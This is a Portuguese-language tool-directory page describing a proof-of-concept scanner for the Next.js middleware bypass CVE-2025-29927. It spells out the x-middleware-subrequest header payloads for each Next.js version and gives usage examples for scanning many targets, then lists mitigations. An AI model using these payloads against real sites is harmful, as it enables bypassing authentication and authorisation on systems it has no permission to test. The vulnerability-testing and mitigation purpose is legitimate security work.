Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-nextjs-CVE-2025-29927 — Scanner automatizado de PoC para a vulnerabilidade de bypass de middleware do Next.js CVE-2025-29927. Testa múltiplos payloads x-middleware-subrequest em URLs alvo com varredura concorrente e exportação JSON. | Kitploit
Ferramentas/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Scanner automatizado de PoC para a vulnerabilidade de bypass de middleware do Next.js CVE-2025-29927. Testa múltiplos payloads x-middleware-subrequest em URLs alvo com varredura concorrente e exportação JSON.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner de Vulnerabilidade Middleware Subrequest do Next.js

Uma ferramenta robusta de prova de conceito (PoC) para detectar a vulnerabilidade de middleware do Next.js (CVE-2025-29927).

Visão Geral

Esta ferramenta testa uma vulnerabilidade crítica em aplicações Next.js onde o cabeçalho x-middleware-subrequest pode ser usado para contornar verificações de segurança implementadas no middleware. O exploit envolve o envio de solicitações HTTP com cabeçalhos maliciosos específicos, variando conforme a versão do Next.js.

Como Funciona o Exploit

De acordo com a pesquisa, existem diferentes payloads para diferentes versões do Next.js:

  1. Versões anteriores à 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versões a partir da 12.2:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    ou

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

(se a aplicação usar o diretório src)

  • Versões mais recentes (como 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    ou

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    
  • Nossa PoC testa todos esses payloads automaticamente e reporta qual foi bem-sucedido.

    Funcionalidades

    • Teste de um ou múltiplos alvos
    • Escaneamento concorrente com multithreading
    • Caminhos de requisição personalizáveis
    • Teste automático de todos os payloads possíveis
    • Saída detalhada e colorida no terminal
    • Exportação de resultados em JSON
    • Tratamento robusto de erros
    • Detecção abrangente de vulnerabilidades

    Requisitos

    • Python 3.7+
    • Pacotes necessários:
      • requests
      • colorama

    Instalação

    root@kitploit:~
    # Clone o repositório ou baixe os arquivos
    # Navegue até o diretório
    cd poc-nextjs-2025
    
    # Instale os pacotes necessários
    pip install -r requirements.txt
    

    Uso

    root@kitploit:~
    python main.py -u https://exemplo.com   # Testar uma única URL
    python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo
    

    Argumentos de Linha de Comando

    OpçãoDescrição
    -u, --url URLURL alvo para escanear
    -f, --file ARQUIVOArquivo contendo múltiplas URLs para escanear (uma por linha)
    -p, --paths CAMINHOSLista de caminhos para testar separados por vírgula (padrão: caminhos comuns)
    -t, --threads NNúmero de threads concorrentes (padrão: 5)
    -o, --output ARQUIVOSalvar resultados em arquivo JSON
    --timeout NTempo limite da requisição em segundos (padrão: 10)

    Exemplos

    root@kitploit:~
    # Escaneamento básico de um único alvo
    python main.py -u https://exemplo.com
    
    # Escanear múltiplos alvos com caminhos personalizados
    python main.py -f alvos.txt -p /api/users,/admin,/dashboard
    
    # Escanear com maior concorrência e timeout mais longo
    python main.py -u https://exemplo.com -t 10 --timeout 15
    
    # Salvar resultados em um arquivo JSON
    python main.py -u https://exemplo.com -o resultados_scan.json
    

    Metodologia de Detecção

    O scanner funciona através de:

    1. Envio de uma requisição normal para o alvo
    2. Envio de requisições com diferentes variações do cabeçalho x-middleware-subrequest conforme as versões do Next.js
    3. Comparação das respostas para identificar indicadores de vulnerabilidade:
      • Requisição normal bloqueada (4xx/5xx) mas requisição de exploit permitida (2xx)
      • Diferença significativa no conteúdo da resposta
      • Indicadores de bypass de autenticação/autorização

    Mitigação

    Se você descobrir aplicações vulneráveis, aplique estas mitigações:

    • Atualize para as versões 14.2.25 ou 15.2.3 ou posteriores do Next.js
    • Implemente um middleware que bloqueie requisições com o cabeçalho x-middleware-subrequest
    root@kitploit:~
    export function middleware(request: NextRequest) {
      if (request.headers.has('x-middleware-subrequest')) {
        return new Response('Unauthorized', { status: 401 });
      }
      return NextResponse.next();
    }
    
    Baixar ferramenta